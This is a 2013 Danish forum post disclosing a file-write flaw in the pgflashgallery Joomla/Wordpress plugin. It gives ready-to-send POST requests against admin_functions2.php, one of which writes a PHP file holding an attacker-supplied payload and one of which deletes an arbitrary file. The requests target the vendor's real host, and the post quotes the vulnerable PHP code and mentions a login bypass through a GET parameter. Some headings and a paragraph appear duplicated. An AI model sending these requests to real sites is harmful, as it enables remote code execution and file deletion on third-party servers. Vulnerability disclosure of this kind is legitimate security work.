17-07-2013, 02:24
pgflashgallery er et Joomla/Wordpress plugin udviklet af http://www.photo-graffix.com.
Heldigvis er det her plugin ikke saerlig udbredt. Google kan dog finde nogle sider, der bruger det.
Exploit:
filename.php bliver lavet og indeholder den payload, der er givet med.
Vuln. code:
For at slette filen igen kan flg. POST request bruges:
Vuln. code:
Har kun testet Joomla sider, men er overbevist om, at samme fejl er til at finde paa WP pluginet. Alt koden er usikkert. Der kan logges paa ved at saette et GET parameter til 1, men det her var umiddelbart den stoerste fejl, der var.
Heldigvis er det her plugin ikke saerlig udbredt. Google kan dog finde nogle sider, der bruger det.
Exploit:
Kode:
POST /joomla/components/com_pgflashgallery/admin_functions2.php HTTP/1.1
Host: www.photo-graffix.com
func=add_new_option&cart_file=filename.php&global_cart_file=1&newop=[payload]Vuln. code:
PHP kode:
$newop = $_POST['newop'];
$global_cart_file = $_POST['global_cart_file'];
if ($func == "add_new_option") {
$udfile = $cart_file;
if(file_exists($udfile)){
$newdata = file_get_contents($udfile);
$newdata = str_replace("&END", $newop."&END", $newdata);
}else{
if($global_cart_file == 1){
$newdata = "&PG_BUY=".$newop."&END";
}else{
$newdata = "&PG_DESCRIPTION=&PG_RATING=&PG_TAGS=&PG_COUNT=0&PG_COMMENTS=&PG_BUY=".$newop."&END";
}
}
$fp = fopen($udfile, "w+");
$fw = fwrite( $fp, $newdata );
fclose( $fp );
}
For at slette filen igen kan flg. POST request bruges:
Kode:
POST /joomla/components/com_pgflashgallery/admin_functions2.php HTTP/1.1
Host: www.photo-graffix.com
func=delete_cart_options&cart_file=filename.php&del_crtfile=1Vuln. code:
PHP kode:
$cart_file = $_POST['cart_file'];
$coption = $_POST['coption'];
$del_crtfile = $_POST['del_crtfile'];
if ($func == "delete_cart_options") {
$udfile = $cart_file;
if ($del_crtfile == 1){
(!unlink($cart_file)) ;
}else{
$newdata = file_get_contents($udfile);
$newdata = str_replace($coption, "", $newdata);
$fp = fopen($udfile, "w+");
$fw = fwrite( $fp, $newdata );
fclose( $fp );
}
}